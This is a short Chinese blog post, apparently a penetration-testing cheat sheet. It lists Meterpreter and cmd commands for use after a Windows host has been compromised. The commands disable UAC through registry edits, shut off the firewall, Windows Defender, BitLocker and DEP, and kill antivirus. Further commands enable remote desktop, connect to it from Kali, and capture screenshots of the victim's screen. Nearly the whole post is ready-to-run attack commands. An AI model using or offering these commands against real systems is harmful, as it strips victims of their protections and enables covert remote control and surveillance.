关闭防护机制、远程桌面、截图

关闭UAC

meterpreter > shell

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

C:\Windows\system32>shutdown /r /t 0  有时可能需要重启才能生效


C:\Windows\system32>netsh advfirewall set allprofiles state off  关闭防火墙

C:\Windows\system32>net stop windefend  关闭Windows Defender服务

C:\Windows\system32>manage-bde -status C:  查看C盘Bitlocker状态

C:\Windows\system32>manage-bde -off C:  关闭Bitlocker磁盘加密

C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff  关闭DEP

meterpreter > run post/windows/manage/killav  关闭杀毒软件


远程桌面

meterpreter > run post/windows/manage/enable_rdp  开启远程桌面

root@kali:~# rdesktop 192.168.80.33  在Kali上连接目标主机

meterpreter > run multi_console_command -r /root/.msf4/loot/20170407110920_default_192.168.80.33_host.windows.cle_874214.txt  关闭远程桌面


meterpreter > screenshot  截图目标主机

meterpreter > load espia

meterpreter > screengrab  截图目标主机

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 这篇文章几乎几乎原封不动的搬过来了这位博主的内容,作为自己以后查询方便用~ reference:http://bl...
    DeamoV阅读 20,538评论 3 33
  • dos 批处理 一:windows的命令行模式(win+R)在里面写CMD就可以进入windows的命令行模式了二...
    chenchao981阅读 795评论 0 6
  • 一.清理垃圾 在Windows在安装和使用过程中都会产生相当多的垃圾文件,包括临时文件(如:*.tmp、*._mp...
    灰斗儿阅读 808评论 3 16
  • 女儿期终考试后的一个周六,我和女儿在家,无事。 我在看书,女儿在玩开心网。 这时,女儿的同学打电话来邀请女儿去她家...
    疏食遨游客阅读 584评论 0 0
  • 我家先生是个老实人,木的很,我每次心情不好他都不明白为什么,然后就在我面前表现的很委屈,我只想说,老娘心里委屈,你...
    紫晓阿娇阅读 183评论 0 1